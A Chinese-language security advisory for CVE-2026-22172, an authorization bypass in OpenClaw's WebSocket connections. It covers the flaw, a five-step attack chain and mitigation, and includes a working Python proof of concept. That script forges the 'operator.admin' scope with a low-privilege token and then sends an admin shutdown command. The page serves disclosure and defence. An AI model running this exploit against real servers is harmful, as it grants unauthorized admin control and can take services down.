CVE-2026-22172 CVSS 9.9 严重

CVE-2026-22172 OpenClaw权限绕过漏洞

披露日期: 2026-03-20

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-22172

漏洞类型

权限绕过

CVSS评分

9.9 严重

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw 2026.3.12之前的版本在WebSocket连接路径中存在严重的授权绕过漏洞。由于缺乏服务端绑定机制，使用共享令牌或密码认证的连接能够自我声明提升的权限作用域。攻击者可利用此逻辑缺陷声明未经授权的高级作用域（如 operator.admin），从而绕过权限检查执行仅限管理员进行的网关操作，导致系统机密性、完整性和可用性受损。

技术细节

该漏洞的核心在于OpenClaw WebSocket连接处理逻辑中的缺陷。在正常的认证流程中，服务端应根据用户的凭证（如共享令牌或密码）在服务端绑定并分配相应的权限作用域。然而，在受影响版本中，系统允许客户端在建立WebSocket连接时直接自我声明期望的权限作用域，而服务端未对客户端声明的作用域与实际凭证应有的权限进行严格校验和绑定。攻击者只需持有低权限的有效凭证（如普通用户的共享令牌），即可在WebSocket握手或连接建立阶段，手动修改请求参数，将作用域声明为“operator.admin”。由于服务端信任了客户端的声明，攻击者成功获得了管理员权限。这属于典型的逻辑漏洞，利用了信任客户端输入而非服务端强制执行的安全控制失效问题。

攻击链分析

STEP 1

步骤1：侦察

识别目标OpenClaw服务及其WebSocket连接端点。

STEP 2

步骤2：获取凭证

获取一个有效的低权限共享令牌或密码凭证。

STEP 3

步骤3：构造恶意请求

使用获取的凭证连接WebSocket，但在请求体中将scope参数修改为'operator.admin'。

STEP 4

步骤4：权限提升

服务端因未进行服务端绑定，接受客户端声明的提升权限，建立管理员连接。

STEP 5

步骤5：执行操作

利用获取的管理员权限执行敏感的网关操作（如修改配置、重启服务等）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import asyncio
import websockets
import json

# Target configuration
TARGET_URI = "ws://openclaw-server:8080/ws"
SHARED_TOKEN = "low_privilege_token_here"

async def exploit():
    # Construct the payload with elevated scope
    payload = {
        "token": SHARED_TOKEN,
        "scope": "operator.admin"  # Maliciously elevating scope
    }

    try:
        # Connect to the vulnerable WebSocket endpoint
        async with websockets.connect(TARGET_URI) as websocket:
            # Send the authentication message with the forged scope
            await websocket.send(json.dumps(payload))
            print(f"[+] Sent auth payload: {payload}")

            # Wait for server response
            response = await websocket.recv()
            print(f"[+] Server response: {response}")

            # If connected successfully, perform admin operation
            admin_cmd = {"action": "shutdown", "reason": "Exploit"}
            await websocket.send(json.dumps(admin_cmd))
            print("[+] Executed admin-only action.")

    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    asyncio.get_event_loop().run_until_complete(exploit())

影响范围

OpenClaw < 2026.3.12

防御指南

临时缓解措施

在未升级之前，建议在网络层面限制对WebSocket端点的访问，仅允许受信任的IP地址连接；同时加强日志监控，检查是否存在异常的作用域声明行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表